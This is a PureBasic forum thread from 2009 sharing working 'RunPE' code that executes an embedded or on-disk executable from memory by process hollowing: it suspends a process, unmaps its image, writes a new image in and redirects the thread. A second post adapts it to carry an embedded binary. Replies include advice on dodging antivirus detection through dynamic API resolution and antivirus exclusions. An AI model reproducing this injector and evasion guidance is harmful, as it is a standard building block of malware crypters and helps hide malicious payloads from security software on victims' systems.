PureBasic Forums - English

http://www.purebasic.com
https://www.purebasic.fr/english/

Simple: 'RunPE'

https://www.purebasic.fr/english/viewtopic.php?t=37618

Page 1 of 2

Simple: 'RunPE'

Posted: Mon Jun 01, 2009 9:43 pm
by hipy001
Simple: 'RunPE' "Execute from memory"
Works: Tested on Windows sp3 & Windows Vista & Windows 7

Code: Select all

Structure IMAGE_SECTION_HEADER
  SecName.b[8]
  StructureUnion
    PhysicalAddr.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure

Structure IMAGE_SECTION_HEADERS
  ish.IMAGE_SECTION_HEADER[95]
EndStructure

Procedure RunPE(sProc.s, lBuff)

  *idh.IMAGE_DOS_HEADER  = lBuff
  *ish.IMAGE_SECTION_HEADERS
  pi.PROCESS_INFORMATION
  *inh.IMAGE_NT_HEADERS
  si.STARTUPINFO
  lpBaseAddres.l
  Ctx.CONTEXT
  Addr.l
  ret.l
  i.l
  
  CreateProcess_(#NUL, sProc, #NUL, #NUL, #False, #CREATE_SUSPENDED, #NUL, #NUL, @si, @pi)
  Ctx\ContextFlags = #CONTEXT_INTEGER
  If GetThreadContext_(pi\hThread, Ctx) = 0      : Goto EndThread : EndIf
  
  ReadProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @Addr, 4, #NUL)
  If ZwUnmapViewOfSection_(Pi\hProcess, Addr)    : Goto EndThread : EndIf
  If lBuff = 0                                   : Goto EndThread : EndIf
  *inh = lBuff + *idh\e_lfanew
  
  lpBaseAddres = VirtualAllocEx_(pi\hProcess, *inh\OptionalHeader\ImageBase, *inh\OptionalHeader\SizeOfImage, #MEM_COMMIT | #MEM_RESERVE, #PAGE_EXECUTE_READWRITE)
  WriteProcessMemory_(pi\hProcess, lpBaseAddres, lBuff, *inh\OptionalHeader\SizeOfHeaders, @ret)
  *ish = *inh\OptionalHeader + *inh\FileHeader\SizeOfOptionalHeader
  
  For i = 0 To *inh\FileHeader\NumberOfSections - 1
    WriteProcessMemory_(pi\hProcess, lpBaseAddres + *ish\ish[i]\VirtualAddress, lBuff + *ish\ish[i]\PointerToRawData, *ish\ish[i]\SizeOfRawData, @ret)
  Next
  
  WriteProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
  Ctx\Eax = lpBaseAddres + *inh\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_(pi\hThread, Ctx)
  ResumeThread_(pi\hThread)
  End
  
  EndThread:
  TerminateProcess_(pi\hProcess, #NUL)
  CloseHandle_(pi\hThread)
  CloseHandle_(pi\hProcess)
EndProcedure

Procedure Run()
 If ReadFile(0, "C:\1.exe") = 0 : End : EndIf
    lBuf = AllocateMemory(Lof(0))
    ReadData(0, lBuf, Lof(0))
    CloseFile(0)
 ;-----------------------
    File.s = Space(1024)
    GetModuleFileName_(0, File, 1024)
    RunPE(File, lBuf)
EndProcedure

Run()

Posted: Tue Jun 02, 2009 1:51 am
by idle
That's been asked for a few times.
Thanks could be useful.

Posted: Tue Jun 02, 2009 2:11 am
by DoubleDutch
Thanks. :)

Posted: Tue Jun 02, 2009 5:52 am
by fsw
Welcome "AntiVirus Program Activator" :x

This code works as good as the other ones:

http://www.purebasic.fr/english/viewtop ... 2&start=90

Some Antivirus Programs identify it as a virus :shock:

Posted: Tue Jun 02, 2009 12:56 pm
by +18
Why this error occured for me?
Image

test on : 4.30+xp sp3

Posted: Tue Jun 02, 2009 1:04 pm
by DoubleDutch
Turn off your antivirus - it is blocking the linking of the file.

Posted: Tue Jun 02, 2009 1:45 pm
by ts-soft
fsw wrote:This code works as good as the other ones:

http://www.purebasic.fr/english/viewtop ... 2&start=90
No, the difference is, this program works, the other does'nt work on most
PC.

The Problem with Antivirus is another thing

Posted: Tue Jun 02, 2009 5:55 pm
by SFSxOI
All you need to do for the antivirus is add it to the antivirus exclusions so it wont be scanned.

Is there an example of real world usage someone could show us? I'm still not clear on the usefulness of executing a .exe in memory like this.

Posted: Tue Jun 02, 2009 5:58 pm
by +18
this error is very eccentric
if i make a exe from this code, it's work but from compiler run directly don't work

Thanks to hipy001 for sharing this cool code
it is better if masters provide an improvment that :D

Posted: Tue Jun 02, 2009 7:01 pm
by Trond
I've always wondered whether it was simply possible to shellexecute a named pipe for this purpose.

Posted: Tue Jun 02, 2009 7:24 pm
by hipy001
if you want it not detect antivirus Change All Apis To:

Ex:
OpenLibrary(0, "kernel32.dll")
lsAllocEx = GetFunction(0, "VirtualAllocEx")
CloseLibrary(0)

CallFunctionFast(lsAllocEx , ...................)

:wink:

Sorry for my bad English :(

Posted: Tue Jun 02, 2009 7:59 pm
by fsw
Assuming that ZwUnmapViewOfSection is the one causing the AV troubles maybe changing it to NtUnmapViewOfSection would help.

Because MSDN says:
Note If the call to this function occurs in user mode, you should use the name "NtUnmapViewOfSection" instead of "ZwUnmapViewOfSection".
EDIT:
Just tried this and "Avira Antivir Personal" goes still off :cry:

Posted: Tue Jun 02, 2009 9:29 pm
by ts-soft
Here a small enhancement with parameters:

first the included test.exe

Code: Select all

Define.s para1, para2
para1 = ProgramParameter()
para2 = ProgramParameter()

OpenWindow(0, #PB_Ignore, #PB_Ignore, 140, 50, para1, #PB_Window_SystemMenu)

TextGadget(#PB_Any, 10, 10, 120, 20, para2)

Repeat : Until WaitWindowEvent() = #PB_Event_CloseWindow
here the modified RunPE(lBuff, parameters.s)

Code: Select all

EnableExplicit

Structure IMAGE_SECTION_HEADER
  SecName.b[8]
  StructureUnion
    PhysicalAddr.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure

Structure IMAGE_SECTION_HEADERS
  ish.IMAGE_SECTION_HEADER[95]
EndStructure

Procedure RunPE(lBuff, parameters.s)
  Protected *idh.IMAGE_DOS_HEADER  = lBuff
  Protected *ish.IMAGE_SECTION_HEADERS
  Protected pi.PROCESS_INFORMATION
  Protected *inh.IMAGE_NT_HEADERS
  Protected si.STARTUPINFO
  Protected lpBaseAddres.l
  Protected Ctx.CONTEXT
  Protected Addr.l, ret.l, i.l

  CreateProcess_(#NUL, ProgramFilename() + " " + parameters, #NUL, #NUL, #False, #CREATE_SUSPENDED, #NUL, #NUL, @si, @pi)
  Ctx\ContextFlags = #CONTEXT_INTEGER
  If GetThreadContext_(pi\hThread, Ctx) = 0      : Goto EndThread : EndIf
 
  ReadProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @Addr, 4, #NUL)
  If ZwUnmapViewOfSection_(Pi\hProcess, Addr)    : Goto EndThread : EndIf
  If lBuff = 0                                   : Goto EndThread : EndIf
  *inh = lBuff + *idh\e_lfanew
 
  lpBaseAddres = VirtualAllocEx_(pi\hProcess, *inh\OptionalHeader\ImageBase, *inh\OptionalHeader\SizeOfImage, #MEM_COMMIT | #MEM_RESERVE, #PAGE_EXECUTE_READWRITE)
  WriteProcessMemory_(pi\hProcess, lpBaseAddres, lBuff, *inh\OptionalHeader\SizeOfHeaders, @ret)
  *ish = *inh\OptionalHeader + *inh\FileHeader\SizeOfOptionalHeader
 
  For i = 0 To *inh\FileHeader\NumberOfSections - 1
    WriteProcessMemory_(pi\hProcess, lpBaseAddres + *ish\ish[i]\VirtualAddress, lBuff + *ish\ish[i]\PointerToRawData, *ish\ish[i]\SizeOfRawData, @ret)
  Next
 
  WriteProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
  Ctx\Eax = lpBaseAddres + *inh\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_(pi\hThread, Ctx)
  ResumeThread_(pi\hThread)
  ProcedureReturn 
 
  EndThread:
  TerminateProcess_(pi\hProcess, #NUL)
  CloseHandle_(pi\hThread)
  CloseHandle_(pi\hProcess)
EndProcedure

DataSection
  file: IncludeBinary "test.exe"
EndDataSection

RunPE(?file, "para1 para2")

Posted: Thu Jun 04, 2009 11:11 am
by SFSxOI
when ever I try to use this I always get an error that the app failed to start because MSVCR80.dll was not found (which is a kinda odd and unexpected error). Works OK with the test.exe above, but for any other .exe I get this error. Is that normal for this? Running Vista, and running the code in admin mode.

Posted: Thu Jun 18, 2009 10:33 pm
by cas
Can we modify this code to allow dll load and open from memory? :roll:

Thanks
All times are UTC+01:00
Page 1 of 2

Powered by phpBB® Forum Software © phpBB Limited